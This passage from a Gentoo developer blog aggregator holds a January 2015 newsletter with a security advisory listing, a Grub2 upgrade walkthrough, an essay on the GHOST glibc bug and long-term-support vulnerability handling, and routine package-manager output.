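# Block until an address is obtained, like running "dhcpcd -w".
waitip
# Or wait specifically for an IPv4 address:
#waitip 4
```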

February 05, 2015

There has recently been a discussion among developers about the default choice of ffmpeg/libav in Gentoo. Until recently, libav was implicitly the default by being the first dependency of virtual/ffmpeg. Now the choice of libav has been made explicit in the portage profiles, and a news item regarding this was published.

In order to get a data point which might be useful for the discussion, I have created a poll in the forum, where Gentoo users can state their preference about the default:

You are welcome to vote in the poll, and if you wish also state your reasons in a comment. However, as the topic of ffmpeg/libav split has been discussed extensively already, I ask you to not restart that discussion in the forum thread.

February 03, 2015
Gentoo Monthly Newsletter: January 2015 (February 03, 2015, 22:00 UTC)

Gentoo News

Council News

One topic addressed in the January council meeting was what happens if a developer wants to join a project and contribute, and sends e-mail to the project or its lead, but no one picks up the phone or answers e-mails there… General agreement was that after applying for project membership and some waiting time without any response, one should just “be bold”, add oneself to the project, and start contributing in a responsible fashion.

A second item was the policy for long-term masked packages. Since a mask message is much more visible than, say, a post-installation warning, the decision was that packages with security vulnerabilities may remain in the tree package-masked, assuming there are no replacements for them and they have active maintainers. Naturally the mask message must clearly spell out the problems with the package.

Unofficial Gentoo Portage Git Mirror

Thanks to Sven Wegener and Michał Górny, we now have an unofficial Gentoo Portage git mirror. Below is the announcement as posted on the mailing lists:

Hello, everyone.

I have the pleasure to announce that the official rsync2git mirror is up and running [1] thanks to
Sven Wegener. It is updated from rsync every 30 minutes, and can be used both to sync your local
Gentoo installs and to submit improvements via pull requests (see README [2] for some details).

At the same time, I have established the 'Git Mirror' [3] project which welcomes developers
willing to help reviewing the pull requests and helping those improvements reach
package maintainers.

For users, this means that we now have a fairly efficient syncing
method and a pull request-based workflow for submitting fixes.
The auto-synced repository can also make proxy-maint workflow easier.
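For users on a Portage version with git sync support, pointing a system at the mirror amounts to a repos.conf entry along these lines (the sync-uri below is deliberately a placeholder; use the one given in the announcement's README):

```
# /etc/portage/repos.conf/gentoo.conf
[gentoo]
location = /usr/portage
sync-type = git
# Placeholder: substitute the mirror URI from the announcement's README
sync-uri = <rsync2git mirror URI>
auto-sync = yes
```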

For developers, this means one of:

a. if you want to help us, join the team, watch the pull requests.
CC maintainers when appropriate, review, even work towards merging
the changes with approval of the maintainers,

b. if you want to support git users, just wait till we CC you and then review, help, merge :),

c. if you don't want to support git users, just ignore the repo. We'll bother you
directly after the changes are reviewed and ready :).


Gentoo Developer Moves


Gentoo is made up of 246 active developers, of which 36 are currently away.
Gentoo has recruited a total of 807 developers since its inception.


  • Manuel Rüger joined the python and QA teams
  • Mikle Kolyada joined the PPC team
  • Sergey Popov joined the s390 team and left the Qt team
  • Michał Górny joined the git mirror and overlays teams
  • Mark Wright joined the mathematics and haskell teams
  • Samuel Damashek left the gentoo-keys team
  • Matt Thode left the gentoo-keys team



This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 164
Packages 17977
Ebuilds 37150
Architecture Stable Testing Total % of Packages
alpha 3538 676 4214 23.44%
amd64 10889 6598 17487 97.27%
amd64-fbsd 2 1586 1588 8.83%
arm 2681 1869 4550 25.31%
arm64 536 88 624 3.47%
hppa 3107 499 3606 20.06%
ia64 3099 694 3793 21.10%
m68k 600 125 725 4.03%
mips 1 2428 2429 13.51%
ppc 6740 2543 9283 51.64%
ppc64 4308 1064 5372 29.88%
s390 1391 424 1815 10.10%
sh 1504 558 2062 11.47%
sparc 4037 982 5019 27.92%
sparc-fbsd 0 315 315 1.75%
x86 11511 5589 17100 95.12%
x86-fbsd 0 3202 3202 17.81%



No GLSAs were released in January 2015. However, since there was no GMN for December 2014, we include the ones for the previous month as well.

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201412-53 app-crypt/mit-krb5 MIT Kerberos 5: User-assisted execution of arbitrary code 516334
201412-52 net-analyzer/wireshark Wireshark: Multiple vulnerabilities 522968
201412-51 net-misc/asterisk Asterisk: Multiple vulnerabilities 530056
201412-50 net-mail/getmail getmail: Information disclosure 524684
201412-49 app-shells/fish fish: Multiple vulnerabilities 509044
201412-48 sys-apps/file file: Denial of Service 532686
201412-47 sys-cluster/torque TORQUE Resource Manager: Multiple vulnerabilities 372959
201412-46 media-libs/lcms LittleCMS: Denial of Service 479874
201412-45 dev-ruby/facter Facter: Privilege escalation 514476
201412-44 sys-apps/policycoreutils policycoreutils: Privilege escalation 509896
201412-43 app-text/mupdf MuPDF: User-assisted execution of arbitrary code 358029
201412-42 app-emulation/xen Xen: Denial of Service 523524
201412-41 net-misc/openvpn OpenVPN: Denial of Service 531308
201412-40 media-libs/flac FLAC: User-assisted execution of arbitrary code 530288
201412-39 dev-libs/openssl OpenSSL: Multiple vulnerabilities 494816
201412-38 net-misc/icecast Icecast: Multiple Vulnerabilities 529956
201412-37 app-emulation/qemu QEMU: Multiple Vulnerabilities 528922
201412-36 app-emulation/libvirt libvirt: Denial of Service 532204
201412-35 app-admin/rsyslog RSYSLOG: Denial of Service 395709
201412-34 net-misc/ntp NTP: Multiple vulnerabilities 533076
201412-33 net-dns/pdns-recursor PowerDNS Recursor: Multiple vulnerabilities 299942
201412-32 mail-mta/sendmail sendmail: Information disclosure 511760
201412-31 net-irc/znc ZNC: Denial of Service 471738
201412-30 www-servers/varnish Varnish: Multiple vulnerabilities 458888
201412-29 www-servers/tomcat Apache Tomcat: Multiple vulnerabilities 442014
201412-28 dev-ruby/rails Ruby on Rails: Multiple vulnerabilities 354249
201412-27 dev-lang/ruby Ruby: Denial of Service 355439
201412-26 net-misc/strongswan strongSwan: Multiple Vulnerabilities 507722
201412-25 dev-qt/qtgui QtGui: Denial of Service 508984
201412-24 media-libs/openjpeg OpenJPEG: Multiple vulnerabilities 484802
201412-23 net-analyzer/nagios-core Nagios: Multiple vulnerabilities 447802
201412-22 dev-python/django Django: Multiple vulnerabilities 521324
201412-21 www-apache/mod_wsgi mod_wsgi: Privilege escalation 510938
201412-20 gnustep-base/gnustep-base GNUstep Base library: Denial of Service 508370
201412-19 net-dialup/ppp PPP: Information disclosure 519650
201412-18 net-misc/freerdp FreeRDP: User-assisted execution of arbitrary code 511688
201412-17 app-text/ghostscript-gpl GPL Ghostscript: Multiple vulnerabilities 264594
201412-16 dev-db/couchdb CouchDB: Denial of Service 506354
201412-15 app-admin/mcollective MCollective: Privilege escalation 513292
201412-14 media-gfx/xfig Xfig: User-assisted execution of arbitrary code 297379
201412-13 www-client/chromium Chromium: Multiple vulnerabilities 524764
201412-12 sys-apps/dbus D-Bus: Multiple Vulnerabilities 512940
201412-11 app-emulation/emul-linux-x86-baselibs AMD64 x86 emulation base libraries: Multiple vulnerabilities 196865
201412-10 www-apps/egroupware (and 6 more) Multiple packages, Multiple vulnerabilities fixed in 2012 284536
201412-09 games-sports/racer-bin (and 24 more) Multiple packages, Multiple vulnerabilities fixed in 2011 194151
201412-08 dev-util/insight (and 26 more) Multiple packages, Multiple vulnerabilities fixed in 2010 159556
201412-07 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 530692
201412-06 dev-libs/libxml2 libxml2: Denial of Service 525656
201412-05 app-antivirus/clamav Clam AntiVirus: Denial of service 529728
201412-04 app-emulation/libvirt libvirt: Multiple vulnerabilities 483048
201412-03 net-mail/dovecot Dovecot: Denial of Service 509954
201412-02 net-fs/nfs-utils nfs-utils: Information disclosure 464636
201412-01 app-emulation/qemu QEMU: Multiple Vulnerabilities 514680

Package Removals/Additions


Package Developer Date
app-admin/rudy mrueg 01 Jan 2015
dev-ruby/attic mrueg 01 Jan 2015
dev-ruby/caesars mrueg 01 Jan 2015
dev-ruby/hexoid mrueg 01 Jan 2015
dev-ruby/gibbler mrueg 01 Jan 2015
dev-ruby/rye mrueg 01 Jan 2015
dev-ruby/storable mrueg 01 Jan 2015
dev-ruby/tryouts mrueg 01 Jan 2015
dev-ruby/sysinfo mrueg 01 Jan 2015
dev-perl/MooseX-AttributeHelpers zlogene 01 Jan 2015
dev-db/pgasync titanofold 07 Jan 2015
app-misc/cdcollect pacho 07 Jan 2015
net-im/linpopup pacho 07 Jan 2015
media-gfx/f-spot pacho 07 Jan 2015
media-gfx/truevision pacho 07 Jan 2015
dev-ruby/tmail mrueg 21 Jan 2015
dev-ruby/refe mrueg 21 Jan 2015
dev-ruby/mysql-ruby mrueg 21 Jan 2015
dev-ruby/gem_plugin mrueg 21 Jan 2015
dev-ruby/directory_watcher mrueg 21 Jan 2015
dev-ruby/awesome_nested_set mrueg 21 Jan 2015
app-emacs/cedet ulm 28 Jan 2015
app-vim/svncommand radhermit 30 Jan 2015
app-vim/cvscommand radhermit 30 Jan 2015


Package Developer Date
dev-ruby/rails-html-sanitizer graaff 01 Jan 2015
dev-ruby/rails-dom-testing graaff 01 Jan 2015
dev-ruby/rails-deprecated_sanitizer graaff 01 Jan 2015
dev-ruby/activejob graaff 01 Jan 2015
app-crypt/gkeys-gen dolsen 01 Jan 2015
dev-haskell/bencode gienah 03 Jan 2015
dev-haskell/torrent gienah 03 Jan 2015
dev-python/PyPDF2 idella4 03 Jan 2015
dev-python/tzlocal floppym 03 Jan 2015
dev-python/APScheduler floppym 03 Jan 2015
app-emacs/dts-mode ulm 03 Jan 2015
dev-python/configargparse radhermit 04 Jan 2015
dev-haskell/setlocale slyfox 04 Jan 2015
dev-haskell/hgettext slyfox 04 Jan 2015
dev-python/parsley mrueg 05 Jan 2015
dev-python/vcversioner mrueg 06 Jan 2015
dev-python/txsocksx mrueg 06 Jan 2015
media-plugins/vdr-rpihddevice hd_brummy 06 Jan 2015
net-misc/chrome-remote-desktop vapier 06 Jan 2015
app-admin/systemrescuecd-x86 mgorny 06 Jan 2015
dev-python/pgasync titanofold 07 Jan 2015
net-proxy/shadowsocks-libev dlan 08 Jan 2015
net-misc/i2pd blueness 08 Jan 2015
games-misc/exult-sound mr_bones_ 09 Jan 2015
kde-frameworks/kpackage mrueg 09 Jan 2015
kde-frameworks/networkmanager-qt mrueg 09 Jan 2015
games-puzzle/ksokoban bircoph 10 Jan 2015
dev-cpp/lucene++ johu 10 Jan 2015
app-emacs/multi-term ulm 10 Jan 2015
dev-java/xml-security ercpe 11 Jan 2015
dev-libs/libtreadstone patrick 13 Jan 2015
dev-libs/utfcpp yac 13 Jan 2015
net-print/epson-inkjet-printer-escpr floppym 15 Jan 2015
dev-cpp/websocketpp johu 16 Jan 2015
sys-apps/systemd-readahead pacho 17 Jan 2015
dev-util/radare2 slyfox 18 Jan 2015
dev-python/wcsaxes xarthisius 18 Jan 2015
net-analyzer/apinger jer 19 Jan 2015
dev-lang/go-bootstrap williamh 20 Jan 2015
media-plugins/vdr-satip hd_brummy 20 Jan 2015
dev-perl/Data-Types chainsaw 20 Jan 2015
dev-perl/DateTime-Tiny chainsaw 20 Jan 2015
dev-perl/MongoDB chainsaw 20 Jan 2015
dev-python/paramunittest alunduil 21 Jan 2015
dev-python/mando alunduil 21 Jan 2015
dev-python/radon alunduil 21 Jan 2015
sci-geosciences/opencpn-plugin-br24radar mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-climatology mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-launcher mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-logbookkonni mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-objsearch mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-ocpndebugger mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-statusbar mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-weatherfax mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-weather_routing mschiff 21 Jan 2015
sci-geosciences/opencpn-plugin-wmm mschiff 21 Jan 2015
dev-python/elasticsearch-py vapier 22 Jan 2015
dev-php/ming-php grknight 22 Jan 2015
app-portage/cpuinfo2cpuflags mgorny 23 Jan 2015
dev-ruby/spy mrueg 24 Jan 2015
dev-ruby/power_assert graaff 25 Jan 2015
dev-ruby/vcr graaff 25 Jan 2015
dev-util/trace-cmd chutzpah 27 Jan 2015
net-libs/iojs patrick 27 Jan 2015
dev-python/bleach radhermit 27 Jan 2015
dev-python/readme radhermit 27 Jan 2015
www-client/vivaldi jer 27 Jan 2015
media-libs/libpagemaker jlec 27 Jan 2015
dev-python/jenkinsapi idella4 28 Jan 2015
dev-python/httmock idella4 28 Jan 2015
dev-python/jenkins-webapi idella4 29 Jan 2015
sec-policy/selinux-git perfinion 29 Jan 2015
x11-drivers/xf86-video-opentegra chithanh 29 Jan 2015
dev-java/cssparser monsieurp 30 Jan 2015
app-emulation/docker-compose alunduil 31 Jan 2015
dev-python/oslo-context prometheanfire 31 Jan 2015
dev-python/oslo-middleware prometheanfire 31 Jan 2015
dev-haskell/tasty-kat qnikst 31 Jan 2015
dev-perl/Monitoring-Plugin mjo 31 Jan 2015


The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.


The following tables and charts summarize the activity on Bugzilla between 01 January 2015 and 31 January 2015. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 2113
Closed 1058
Not fixed 182
Duplicates 150
Total 6525
Blocker 3
Critical 16
Major 62

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Perl team 66
2 Gentoo Linux Gnome Desktop Team 66
3 Python Gentoo Team 44
4 Gentoo Games 42
5 Gentoo KDE team 34
6 Default Assignee for Orphaned Packages 27
7 Gentoo's Haskell Language team 26
8 Gentoo Security 22
9 Gentoo Ruby Team 22
10 Others 708


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Security 106
2 Gentoo Linux bug wranglers 103
3 Gentoo Perl team 72
4 Gentoo Games 72
5 Python Gentoo Team 66
6 Gentoo Linux Gnome Desktop Team 66
7 Gentoo's Haskell Language team 65
8 Default Assignee for Orphaned Packages 54
9 Java team 53
10 Others 1455


Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to

Comments or Suggestions?

Please head over to this forum post.

February 02, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Mozilla: Hating you so you don't have to (February 02, 2015, 02:33 UTC)

Ahem. I'm mildly amused, Firefox 35 shows me this nice little informational message in the "Get addons" view:

Secure Connection Failed

An error occurred during a connection to 
Peer's Certificate has been revoked. (Error code: sec_error_revoked_certificate) 
Oh well. Why was I looking at that anyway? Well, for some reason I've had adb (the Android debug bridge) running on my desktop. Which makes little sense ... but ... find tells me:
So now there's a random service running *when I start firefox* because ...

err, I might want to “test, deploy and debug HTML5 web apps on Firefox OS phones & Simulator, directly from Firefox browser.”
Which I don't. But I appreciate having extra crap default-enabled for no reason. Sigh.

Mozilla: We hate you so you don't have to

January 31, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Choice included (January 31, 2015, 17:35 UTC)

Some time ago, Matteo Pescarin created the great "Gentoo Abducted" design. Here are, after some minor doodling for the fun of it, several A0 posters based on that design, pointing out the excellent features of Gentoo. Released under CC BY-SA 2.5 as the original. Enjoy!






Sebastian Pipping a.k.a. sping (homepage, bugs)
Switching to Grub2 on Gentoo (January 31, 2015, 17:26 UTC)


There seem to be quite a number of people who are “afraid” of Grub2 because of its “no single file” approach. From several people I hear of sticking to Grub legacy or moving to syslinux rather than upgrading to Grub2.

I used to be one of those not too long ago: I’ve been sticking to Grub legacy for quite a while, mainly because I never felt like breaking a booting system at that very moment. I have finally upgraded my Gentoo dev machine to Grub2 now and I’m rather happy with the results:

  • No manual editing of Grub2 config files for kernel upgrades any more
  • The Grub2 rescue shell, if I should break things
  • Fancy theming if I feel like that next week
  • I am no longer running more or less unmaintained software

My steps to upgrade were:

1. Install sys-boot/grub:2.

2. Inspect the output of “sudo grub2-mkconfig” (which goes to stdout) to get a feeling for it.

3. Tune /etc/default/grub a bit:


# This is genkernel
GRUB_CMDLINE_LINUX="dolvm dokeymap keymap=de
    real_root=/dev/gentoo/root noslowusb"

# A bit retro, works with and without external display


NOTE: I broke the GRUB_CMDLINE_LINUX line for readability only.

4. Insert a “shutdown” menu entry at /etc/grub.d/40_custom:

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries.  Simply type the
# menu entries you want to add after this comment.  Be careful not to change
# the 'exec tail' line above.

menuentry "Shutdown" {
	halt
}
5. Run “sudo grub2-mkconfig -o /boot/grub/grub.cfg“.

6. Run “sudo grub2-install /dev/disk/by-id/ata-HITACHI_000000000000000_00000000000000000000“.

Using /dev/disk/ greatly reduces the risk of installing to the wrong disk.
Check “find /dev/disk | xargs ls -ld“.

7. Reboot


For kernel updates, my new process is

emerge -auv sys-kernel/vanilla-sources

pushd /usr/src
cp linux-3.18.3/.config linux-3.18.4/

# yes, sys-kernel/vanilla-sources[symlink] would do that for me
rm linux
ln -s linux-3.18.4 linux

pushd linux
yes '' | make oldconfig

make -j4 && make modules_install install \
		&& emerge tp_smapi \
		&& genkernel initramfs \
		&& grub2-mkconfig -o /boot/grub/grub.cfg


Best, Sebastian

January 29, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

GHOST

On Tuesday details about the security vulnerability GHOST in Glibc were published by the company Qualys. When severe security vulnerabilities hit the news I always like to take this as a chance to learn what can be improved and how to avoid similar incidents in the future (see e.g. my posts on Heartbleed/Shellshock, POODLE/BERserk and NTP lately).

GHOST itself is a heap overflow in the name resolution function of the Glibc. The Glibc is the standard C library on Linux systems; almost every piece of software that runs on a Linux system uses it. It is somewhat unclear right now how serious GHOST really is. A lot of software uses the affected function gethostbyname(), but a lot of conditions have to be met to make this vulnerability exploitable. Right now the most relevant attack is against the mail server Exim, where Qualys has developed a working exploit which they plan to release soon. There have been speculations whether GHOST might be exploitable through WordPress, which would make it much more serious.
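To see how broadly the affected function is reachable, note that even high-level language runtimes route name lookups through the libc resolver; for instance, Python's socket.gethostbyname() wraps gethostbyname()/gethostbyname_r(), while socket.getaddrinfo() uses the newer getaddrinfo() path, which Qualys reported as unaffected (a harmless sketch, not a vulnerability test):

```python
import socket

# gethostbyname() goes through the libc code path GHOST lives in;
# getaddrinfo() is the modern, unaffected replacement API.
print(socket.gethostbyname("localhost"))
print(socket.getaddrinfo("localhost", None)[0][4][0])
```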

Technically GHOST is a heap overflow, which is a very common bug in C programming. C is inherently prone to these kinds of memory corruption errors and there are essentially two things here to move forwards: Improve the use of exploit mitigation techniques like ASLR and create new ones (levee is an interesting project, watch this 31C3 talk). And if possible move away from C altogether and develop core components in memory safe languages (I have high hopes for the Mozilla Servo project, watch this talk).

GHOST was discovered three times

But the thing I want to elaborate on here is something different about GHOST: it turns out that it has been discovered independently three times. It was already fixed in 2013 in the Glibc code itself. The commit message didn't indicate that it was a security vulnerability. Then in early 2014 developers at Google found it again using Address Sanitizer (which, by the way, tells you that all software developers should use Address Sanitizer more often to test their software). Google fixed it in Chrome OS and explicitly called it an overflow and a vulnerability. And then recently Qualys found it again and made it public.

Now you may wonder why a vulnerability fixed in 2013 made headlines in 2015. The reason is that it largely wasn't fixed because it wasn't publicly known that it was serious. I don't think there was any malicious intent. The original Glibc fix was probably done without anyone noticing that it was serious, and the Google devs may have thought that the fix was already public, so they didn't need to make any noise about it. But we can clearly see that something doesn't work here. Which brings us to a discussion of how the Linux and free software world in general, and vulnerability management in particular, work.

The “Never touch a running system” principle

Quite early when I came in contact with computers I heard the phrase “Never touch a running system”. This may have been a reasonable approach to IT systems back then when computers usually weren't connected to any networks and when remote exploits weren't a thing, but it certainly isn't a good idea today in a world where almost every computer is part of the Internet. Because once new security vulnerabilities become public you should change your system and fix them. However that doesn't change the fact that many people still operate like that.

A number of Linux distributions provide “stable” or “Long Time Support” versions. Basically the idea is this: At some point they take the current state of their systems and further updates will only contain important fixes and security updates. They guarantee to fix security vulnerabilities for a certain time frame. This is kind of a compromise between the “Never touch a running system” approach and reasonable security. It tries to give you a system that will basically stay the same, but you get fixes for security issues. Popular examples for this approach are the stable branch of Debian, Ubuntu LTS versions and the Enterprise versions of Red Hat and SUSE.

To give you an idea about time frames, Debian currently supports the stable trees Squeeze (6.0), released in 2011, and Wheezy (7.0), released in 2013. Red Hat Enterprise Linux currently has four supported versions (4, 5, 6, 7), the oldest of which was originally released in 2005. So we're talking about pretty long time frames for which these systems get supported. Ubuntu and SUSE have similarly long-supported systems.

These systems are delivered with an implicit promise: we will take care of security, and if you update regularly you'll have a system that doesn't change much, but that will be secure against known threats. Now the interesting question is: how well do these systems deliver on that promise, and how hard is that?

Vulnerability management is chaotic and fragile

I'm not sure how many people are aware how vulnerability management works in the free software world. It is a pretty fragile and chaotic process. There is no standard way things work. The information is scattered around many different places. Different people look for vulnerabilities for different reasons. Some are developers of the respective projects themselves, some are companies like Google that make use of free software projects, some are just curious people interested in IT security or researchers. They report a bug through the channels of the respective project. That may be a mailing list, a bug tracker or just a direct mail to the developer. Hopefully the developers fix the issue. It does happen that the person finding the vulnerability first has to explain to the developer why it actually is a vulnerability. Sometimes the fix will happen in a public code repository, sometimes not. Sometimes the developer will mention that it is a vulnerability in the commit message or the release notes of the new version, sometimes not. There are notorious projects that refuse to handle security vulnerabilities in a transparent way. Sometimes whoever found the vulnerability will post more information on his/her blog or on a mailing list like full disclosure or oss-security. Sometimes not. Sometimes vulnerabilities get a CVE id assigned, sometimes not.

Add to that the fact that in many cases it's far from clear what is a security vulnerability. It is absolutely common that if you ask the people involved whether this is serious the best and most honest answer they can give is “we don't know”. And very often bugs get fixed without anyone noticing that it even could be a security vulnerability.

Then there are projects where the number of security vulnerabilities found and fixed is really huge. The latest Chrome 40 release had 62 security fixes, version 39 had 42. Chrome releases a new version every two months. Browser vulnerabilities are found and fixed on a daily basis. Not that extreme but still high is the vulnerability count in PHP, which is especially worrying if you know that many webhosting providers run PHP versions not supported any more.

So you probably see my point: There is a very chaotic stream of information in various different places about bugs and vulnerabilities in free software projects. The number of vulnerabilities is huge. Making a promise that you will scan all this information for security vulnerabilities and backport the patches to your operating system is a big promise. And I doubt anyone can fulfill that.

GHOST is a single example, so you might ask how often these things happen. At some point right after GHOST became public this excerpt from the Debian Glibc changelog caught my attention (excuse the bad quality; I had to take the image from Twitter because I was unable to find that changelog on Debian's webpages):

eglibc Changelog

What you can see here: While Debian fixed GHOST (which is CVE-2015-0235) they also fixed CVE-2012-6656 – a security issue from 2012. Admittedly this is a minor issue, but it's a vulnerability nevertheless. A quick look at the Debian changelog of Chromium both in squeeze and wheezy will tell you that they aren't fixing all the recent security issues in it. (Debian already had discussions about removing Chromium and in Wheezy they don't stick to a single version.)
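Mechanically scanning changelogs for CVE ids is one of the few parts of this that is easy to automate. A minimal sketch (the changelog lines below are a paraphrased sample, not the verbatim Debian entry):

```shell
# Extract the CVE ids mentioned in a changelog and list each one once.
# The sample below paraphrases the kind of entry shown above.
cat > changelog.sample <<'EOF'
eglibc (2.11.3-4+deb6u4) squeeze-lts; urgency=medium
  * Fix CVE-2015-0235 (GHOST: buffer overflow in gethostbyname).
  * Fix CVE-2012-6656 (minor issue in the charset conversion code).
EOF
grep -o 'CVE-[0-9]\{4\}-[0-9]\+' changelog.sample | sort -u
```

The same pattern works against debian/changelog files or release notes; the hard part, as argued above, is that many fixes never mention a CVE at all.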

It would be an interesting (and time consuming) project to take a package like PHP and check, for all its known security vulnerabilities, whether they are fixed in the latest packages in Debian Squeeze/Wheezy, all Red Hat Enterprise versions and other long term support systems. PHP is probably more interesting than browsers, because the high profile targets for these vulnerabilities are servers. What worries me: I'm pretty sure some people already do that. They just won't tell you and me; instead they'll write their exploits and sell them to repressive governments or botnet operators.

Then there are also stories like this: Tavis Ormandy reported a security issue in Glibc in 2012 and the people from Google's Project Zero went to great lengths to show that it is actually exploitable. Reading the Glibc bug report you can learn that this was already reported in 2005(!), just nobody noticed back then that it was a security issue and it was minor enough that nobody cared to fix it.

There are also bugs that require changes so big that backporting them is essentially impossible. In the TLS world a lot of protocol bugs have been highlighted in recent years. Take Lucky Thirteen for example. It is a timing sidechannel in the way the TLS protocol combines the CBC encryption, padding and authentication. I like to mention this bug because I like to quote it as the TLS bug that was already mentioned in the specification (RFC 5246, page 23: "This leaves a small timing channel"). The real fix for Lucky Thirteen is not to use the erratic CBC mode any more and switch to authenticated encryption modes which are part of TLS 1.2. (There's another possible fix which is using Encrypt-then-MAC, but it is hardly deployed.) Up until recently most encryption libraries didn't support TLS 1.2. Debian Squeeze and Red Hat Enterprise 5 ship OpenSSL versions that only support TLS 1.0. There is no trivial patch that could be backported, because this is a huge change. What they likely backported are workarounds that avoid the timing channel. This will stop the attack, but it is not a very good fix, because it keeps the problematic old protocol and will force others to stay compatible with it.
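As a rough illustration of the difference (assuming the OpenSSL command-line tool is installed; the cipher-string keywords are documented in ciphers(1)), you can compare the AEAD suites that avoid this class of problem with the CBC suites an old TLS-1.0-only stack is stuck with:

```shell
# AEAD (GCM) suites: no CBC padding, so no Lucky Thirteen style
# timing side channel. Note the Mac=AEAD column in the output.
openssl ciphers -v 'AESGCM' | head -n 4

# CBC suites with an HMAC - the construction Lucky Thirteen targets:
openssl ciphers -v 'AES+SHA' | head -n 4
```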

LTS and stable distributions are there for a reason

The big question is of course what to do about it. OpenBSD developer Ted Unangst wrote a blog post yesterday titled Long term support considered harmful, I suggest you read it. He argues that we should get rid of long term support completely and urge users to upgrade more often. OpenBSD has a 6 month release cycle and supports two releases, so one version gets supported for one year.

Given what I wrote before you may think that I agree with him, but I don't. While I personally have always avoided using overly old systems – I'm usually using Gentoo, which doesn't have any snapshot releases at all and does rolling releases – I can see the value in long term support releases. There are a lot of systems out there – connected to the Internet – that are never updated. Taking away the option to install systems and let them run with relatively little maintenance overhead over several years will probably result in more systems never receiving any security updates. With all its imperfectness, running a Debian Squeeze with the latest updates is certainly better than running an operating system from 2011 that stopped getting security fixes in 2012.

Improving the information flow

I don't think there is a silver bullet solution, but I think there are things we can do to improve the situation. What could be done is to coordinate and share the work. Debian, Red Hat and other distributions with stable/LTS versions could agree that their next versions are based on a specific Glibc version, and they collaboratively work on providing patch sets to fix all the vulnerabilities in it. This already somehow happens with upstream projects providing long term support versions; the Linux kernel does that, for example. Doing that at scale would require vast organizational changes in the Linux distributions. They would have to agree on a roughly common timescale to start their stable versions.

What I'd consider the most crucial thing is to improve and streamline the information flow about vulnerabilities. When Google fixes a vulnerability in Chrome OS they should make sure this information is shared with other Linux distributions and the public. And they should know where and how they should share this information.

One mechanism that tries to organize the vulnerability process is the system of CVE ids. The idea is actually simple: publicly known vulnerabilities get a fixed id and they are in a public database. GHOST is CVE-2015-0235 (the scheme will soon change because four digits aren't enough for all the vulnerabilities we find every year). I got my first CVEs assigned in 2007, so I have some experience with the CVE system, and it is rather mixed. Sometimes I briefly mention rather minor issues in a mailing list thread and a CVE gets assigned right away. Sometimes I explicitly ask for CVE assignments and never get an answer.

I would like to see us just assign CVEs for everything that even remotely looks like a security vulnerability. However, right now I think the process is too unreliable to deliver that. There are other public vulnerability databases like OSVDB; I have limited experience with them, so I can't judge whether they'd be better suited. Unfortunately people sometimes hesitate to request CVE ids because others abuse the CVE system to count assigned CVEs and use this as a metric of how secure a product is. Such bad statistics are outright dangerous, because they give people an incentive to downplay vulnerabilities or withhold information about them.

This post was partly inspired by some discussions on oss-security.

January 28, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
CGit (January 28, 2015, 05:26 UTC)

Dirty hack of the day:

A CGit Mirror of

I wonder if the update cronjob actually works ...

January 23, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
A story of Dependencies (January 23, 2015, 03:41 UTC)

Yesterday I wanted to update a build chroot I have. And ... strangely ... there was a pile of new dependencies:

# emerge -upNDv world

These are the packages that would be merged, in order:

Calculating dependencies... done!
[ebuild     U  ] sys-devel/patch-2.7.2 [2.7.1-r3] USE="-static {-test} -xattr" 0 KiB
[ebuild     U  ] sys-devel/automake-wrapper-10 [9] 0 KiB
[ebuild  N     ] dev-libs/lzo-2.08-r1:2  USE="-examples -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/dejavu-2.34  USE="-X -fontforge" 0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-common-1.42.0  0 KiB
[ebuild  N     ] media-libs/libpng-1.6.16:0/16  USE="-apng (-neon) -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/vala-common-0.26.1  0 KiB
[ebuild     U  ] dev-libs/libltdl-2.4.5 [2.4.4] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] virtual/ttf-fonts-1  0 KiB
[ebuild  N     ] x11-themes/hicolor-icon-theme-0.14  0 KiB
[ebuild  N     ] dev-perl/XML-NamespaceSupport-1.110.0-r1  0 KiB
[ebuild  N     ] dev-perl/XML-SAX-Base-1.80.0-r1  0 KiB
[ebuild  N     ] virtual/perl-Storable-2.490.0  0 KiB
[ebuild     U  ] sys-libs/readline-6.3_p8-r2 [6.3_p8-r1] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild     U  ] app-shells/bash-4.3_p33-r1 [4.3_p33] USE="net nls (readline) -afs -bashlogger -examples -mem-scramble -plugins -vanilla" 0 KiB
[ebuild  N     ] media-libs/freetype-2.5.5:2  USE="adobe-cff bzip2 -X -auto-hinter -bindist -debug -doc -fontforge -harfbuzz -infinality -png -static-libs -utils" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-SAX-0.990.0-r1  0 KiB
[ebuild  N     ] dev-libs/libcroco-0.6.8-r1:0.6  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
